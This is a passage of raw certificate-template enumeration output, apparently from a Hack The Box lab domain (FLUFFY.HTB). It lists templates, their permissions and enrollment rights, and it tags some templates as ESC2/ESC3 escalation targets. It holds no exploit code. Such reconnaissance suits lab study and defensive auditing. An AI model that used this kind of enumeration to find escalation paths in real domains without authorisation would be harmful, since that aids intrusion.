    Extended Key Usage                  : Secure Email
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  11
    Template Name                       : CEPEncryption
    Display Name                        : CEP Encryption
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  12
    Template Name                       : OfflineRouter
    Display Name                        : Router (Offline request)
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  13
    Template Name                       : IPSECIntermediateOffline
    Display Name                        : IPSec (Offline request)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : IP security IKE intermediate
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  14
    Template Name                       : IPSECIntermediateOnline
    Display Name                        : IPSec
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : IP security IKE intermediate
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
  15
    Template Name                       : SubCA
    Display Name                        : Subordinate Certification Authority
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  16
    Template Name                       : CA
    Display Name                        : Root Certification Authority
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  17
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  18
    Template Name                       : DomainController
    Display Name                        : Domain Controller
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
                                          SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Enterprise Read-only Domain Controllers
                                          FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
  19
    Template Name                       : Machine
    Display Name                        : Computer
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : FLUFFY.HTB\Domain Computers
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
  20
    Template Name                       : MachineEnrollmentAgent
    Display Name                        : Enrollment Agent (Computer)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  21
    Template Name                       : EnrollmentAgentOffline
    Display Name                        : Exchange Enrollment Agent (Offline request)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  22
    Template Name                       : EnrollmentAgent
    Display Name                        : Enrollment Agent
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  23
    Template Name                       : CTLSigning
    Display Name                        : Trust List Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Microsoft Trust List Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  24
    Template Name                       : CodeSigning
    Display Name                        : Code Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Code Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  25
    Template Name                       : EFSRecovery
    Display Name                        : EFS Recovery Agent
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : File Recovery
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  26
    Template Name                       : Administrator
    Display Name                        : Administrator
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Microsoft Trust List Signing
                                          Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  27
    Template Name                       : EFS
    Display Name                        : Basic EFS
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : FLUFFY.HTB\Domain Users
  28
    Template Name                       : SmartcardLogon
    Display Name                        : Smartcard Logon
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Extended Key Usage                  : Client Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  29
    Template Name                       : ClientAuth
    Display Name                        : Authenticated Session
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
  30
    Template Name                       : SmartcardUser
    Display Name                        : Smartcard User
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Extended Key Usage                  : Secure Email
                                          Client Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  31
    Template Name                       : UserSignature
    Display Name                        : User Signature Only
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
